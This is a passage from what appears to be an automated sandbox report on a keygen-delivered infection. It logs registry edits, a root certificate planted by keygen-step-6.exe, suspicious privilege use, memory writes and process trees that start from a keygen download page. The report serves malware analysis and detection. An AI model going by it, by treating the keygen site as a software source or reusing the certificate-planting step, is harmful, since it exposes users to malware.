Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\Certificates MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates\4EEF7FAF0062D34AB = 0300000001000000140000004eef7faf0062d34abee6137e774438ae9988739f04000000010000001000000024d7172657e6b799f66cf32ae88b5c280f0000000100000020000000547b3c62613c9c2b025d5461623ae703e9853ee45a8bf3b425bf63528e992912140000000100000014000000fe7e60dd9d8292295edf1cf80869a75b98896ed01900000001000000100000002aac2185e0e1b6503eb16a495b1815fc5c0000000100000004000000000800001800000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d702000000001000000eb050000308205e7308203cfa003020102021333000001a636dabe8bbe573d9a0000000001a6300d06092a864886f70d01010b0500307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f667420536563757265205365727665722043412032303131301e170d3231303331313139323835325a170d3232303631313139323835325a3081a9310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e310d300b060355040b130442696e67311b301906035504031312494520496e737472756d656e746174696f6e3127302506092a864886f70d010901161862696e6769657465616d406d6963726f736f66742e636f6d30820122300d06092a864886f70d01010105000382010f003082010a0282010100d0b49f5b650f0fa690df343367a2cd62155e98e3c0fc14cb1f696618be8c327ef257f50d47bce3a4286e36edc0382e0ac81096dbce62463bb552970d01d02a7ca642d6faed9b5878c4e2e33e7c9f94ea4eb7f125662d5d2fe78138ce3e827bd98969028a908fab20632542a1ef952c10382b7efcaae1f5e7521d5fb617a93aa002b579a3203726111c73a9832712e3b5d4d140b247c91824de8123b45ea39fbcdb6e5c77d68cd3db64dd24844a1879865356f655cf1c5d94b208e244bd075a9823c87af7bcad6aab52e3444aad2947a7baad0d42c9d785964dbd8b4e09004359094d0646c3ca98e7c698b0fa7d6f1606b1459fd6df8d9aea8ae85911789bc5e10203010001a38201303082012c300e0603551d0f0101ff0404030204f030150603551d25040e300c060a2b0601040182374c0c01301d0603551d0e04160414fe7e60dd9d8292295edf1cf80869a75b98896ed0301f0603551d230418301680143656896549cb5b9b2f3cac4216504d91b933d79130530603551d1f044c304a3048a046a0448642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63726c2f4d69635365635365724341323031315f323031312d31302d31382e63726c306006082b0601050507010104543052305006082b060105050730028644687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63657274732f4d69635365635365724341323031315f323031312d31302d31382e637274300c0603551d130101ff04023000300d06092a864886f70d01010b05000382020100c1055e1c6ece899cbff031668bd0b72ee668484f9392c48efe112ba21c521af47582849539f2fd53f7f8adecc243743211150de90b106e6bdaaedb88a8fc71aff2bd4bfeae5628507aa3b47095bf680a0a56bc6cb9c70871fa0b05857bf1762af884469264870c4139f7f9e93bbedaf73a867994c51e7c8473506f1ca68a8f9059cfa5c068be7ecade98315eebd7e71431ebe7d033b4fc8056d94ab70b03e1368082fc83a82cd632b9f3a03f9c9d51881c39b432ee9856e87835bc0481e57489da3590d20b2b9b0900704de861f994d956a2c0347178c59e5048bb9bbfbe8cef237d5860d7f407dcbce486eee7d98a90509a8f1b81445453326b139f0d2fdc68b831681fa96f2284b8153e3dbe60cb2d0ac030d0e2ecfc85c9d361c25e01cabe57cd6ebdc40708b2bd449152e90d2d45d725db856ab64d29a9fdb9fdb85f6354cbd5be240f4b71fa745db8eb32c0e4ea4747bfa5a4f9a5346e42b3379636d05e52225cea1baa7792b8f51b803658026b11fd0ab5877a99f4e74ff994c61177ea425554a7135d8b020661d2d285eb8bf1aa00d3bf78e2f5dba62cd7befdb85fffe6c1b65643f56fe36cf412f366b03bc8c78c852c1ed43a218256636d67eb8241477d3258af4f96b9698b0326d6d01826734eb18f1b393cbf85c0f9fdab4fb854536110f2f678003f80f270cbb1fbeb5ba09523f959dfeba84319577874e4dec0 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\Certificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\ImageStoreRandomFolder = "slijo0c" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{62FM2EJ3-714D-A09D-WM25-6QFJ226I1FER}\1 = "2204" rUNdlL32.eXe Set value (int) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 0100000005c75a9fb59d02949f951ecfce3980735da96a62b946ed299aaa4f5df6ca5911ec85d706fe00fabcd78b6f3437f705a7ae90d68df430c87b300dc6729b422d1ba13dc1c44679cebff942bd049f0bd3697c1346617ed91d9bd8e4 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000f5b13187e59cb5b30f585ef97eb2b62b4dffe51be9041fc20a30cf05a6fa9c87dcb6c80b2e2ef65131c40bf97749b9f1e623050ffc39c4c5808c MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar MicrosoftEdge.exe -
Processes:
keygen-step-6.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 keygen-step-6.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e keygen-step-6.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 59 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exesoftware_reporter_tool.exechrome.exechrome.exerUNdlL32.eXesvchost.exeWerFault.exekey.exe5801742.exejfiag3g_gg.exeAddInProcess32.exe2600165.exepid process 3764 chrome.exe 3764 chrome.exe 764 chrome.exe 764 chrome.exe 2212 chrome.exe 2212 chrome.exe 5252 chrome.exe 5252 chrome.exe 5600 chrome.exe 5600 chrome.exe 5692 chrome.exe 5692 chrome.exe 5740 chrome.exe 5740 chrome.exe 5796 chrome.exe 5796 chrome.exe 5972 chrome.exe 5972 chrome.exe 5964 software_reporter_tool.exe 5964 software_reporter_tool.exe 4952 chrome.exe 4952 chrome.exe 4952 chrome.exe 4952 chrome.exe 4436 chrome.exe 4436 chrome.exe 188 rUNdlL32.eXe 188 rUNdlL32.eXe 4264 svchost.exe 4264 svchost.exe 4264 svchost.exe 4264 svchost.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 4516 WerFault.exe 3256 key.exe 3256 key.exe 4688 5801742.exe 4688 5801742.exe 5316 jfiag3g_gg.exe 5316 jfiag3g_gg.exe 5644 AddInProcess32.exe 1708 2600165.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
MicrosoftEdgeCP.exepid process 4624 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
software_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exesoftware_reporter_tool.exetaskkill.exerUNdlL32.eXesvchost.exesvchost.exesvchost.exeWerFault.exedescription pid process Token: 33 6012 software_reporter_tool.exe Token: SeIncBasePriorityPrivilege 6012 software_reporter_tool.exe Token: 33 5964 software_reporter_tool.exe Token: SeIncBasePriorityPrivilege 5964 software_reporter_tool.exe Token: 33 6076 software_reporter_tool.exe Token: SeIncBasePriorityPrivilege 6076 software_reporter_tool.exe Token: 33 6096 software_reporter_tool.exe Token: SeIncBasePriorityPrivilege 6096 software_reporter_tool.exe Token: SeDebugPrivilege 4860 taskkill.exe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 4264 svchost.exe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeAuditPrivilege 2544 svchost.exe Token: SeAuditPrivilege 2544 svchost.exe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeDebugPrivilege 188 rUNdlL32.eXe Token: SeAssignPrimaryTokenPrivilege 2796 svchost.exe Token: SeIncreaseQuotaPrivilege 2796 svchost.exe Token: SeSecurityPrivilege 2796 svchost.exe Token: SeTakeOwnershipPrivilege 2796 svchost.exe Token: SeLoadDriverPrivilege 2796 svchost.exe Token: SeSystemtimePrivilege 2796 svchost.exe Token: SeBackupPrivilege 2796 svchost.exe Token: SeRestorePrivilege 2796 svchost.exe Token: SeShutdownPrivilege 2796 svchost.exe Token: SeSystemEnvironmentPrivilege 2796 svchost.exe Token: SeUndockPrivilege 2796 svchost.exe Token: SeManageVolumePrivilege 2796 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2796 svchost.exe Token: SeIncreaseQuotaPrivilege 2796 svchost.exe Token: SeSecurityPrivilege 2796 svchost.exe Token: SeTakeOwnershipPrivilege 2796 svchost.exe Token: SeLoadDriverPrivilege 2796 svchost.exe Token: SeSystemtimePrivilege 2796 svchost.exe Token: SeBackupPrivilege 2796 svchost.exe Token: SeRestorePrivilege 2796 svchost.exe Token: SeShutdownPrivilege 2796 svchost.exe Token: SeSystemEnvironmentPrivilege 2796 svchost.exe Token: SeUndockPrivilege 2796 svchost.exe Token: SeManageVolumePrivilege 2796 svchost.exe Token: SeAuditPrivilege 2544 svchost.exe Token: SeAuditPrivilege 2544 svchost.exe Token: SeDebugPrivilege 4264 svchost.exe Token: SeRestorePrivilege 4516 WerFault.exe Token: SeBackupPrivilege 4516 WerFault.exe Token: SeAssignPrimaryTokenPrivilege 2796 svchost.exe Token: SeIncreaseQuotaPrivilege 2796 svchost.exe Token: SeSecurityPrivilege 2796 svchost.exe Token: SeTakeOwnershipPrivilege 2796 svchost.exe Token: SeLoadDriverPrivilege 2796 svchost.exe Token: SeSystemtimePrivilege 2796 svchost.exe Token: SeBackupPrivilege 2796 svchost.exe Token: SeRestorePrivilege 2796 svchost.exe Token: SeShutdownPrivilege 2796 svchost.exe Token: SeSystemEnvironmentPrivilege 2796 svchost.exe Token: SeUndockPrivilege 2796 svchost.exe -
Suspicious use of FindShellTrayWindow 12 IoCs
Processes:
chrome.exepid process 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe 764 chrome.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
Browzar.exeMicrosoftEdge.exeMicrosoftEdgeCP.exepid process 4708 Browzar.exe 4708 Browzar.exe 4708 Browzar.exe 4708 Browzar.exe 4708 Browzar.exe 4708 Browzar.exe 4708 Browzar.exe 356 MicrosoftEdge.exe 4624 MicrosoftEdgeCP.exe 4624 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 764 wrote to memory of 1972 764 chrome.exe chrome.exe PID 764 wrote to memory of 1972 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3772 764 chrome.exe chrome.exe PID 764 wrote to memory of 3764 764 chrome.exe chrome.exe PID 764 wrote to memory of 3764 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe PID 764 wrote to memory of 2964 764 chrome.exe chrome.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1076
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2808
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.net/keygen/keygen-Acronis-Backup-For-Vmware-9.0.10007.html1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff9d0f64f50,0x7ff9d0f64f60,0x7ff9d0f64f702⤵PID:1972
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1648 /prefetch:22⤵PID:3772
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1724 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3764 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 /prefetch:82⤵PID:2964
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2784 /prefetch:12⤵PID:3036
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2792 /prefetch:12⤵PID:2816
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2516 /prefetch:12⤵PID:904
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:12⤵PID:4072
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:12⤵PID:900
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:12⤵PID:804
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4000 /prefetch:82⤵PID:4388
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:12⤵PID:4408
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:12⤵PID:4740
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6948 /prefetch:82⤵PID:4884
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7088 /prefetch:82⤵PID:4920
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7236 /prefetch:82⤵PID:4956
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7060 /prefetch:82⤵PID:4992
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7180 /prefetch:82⤵PID:5004
-
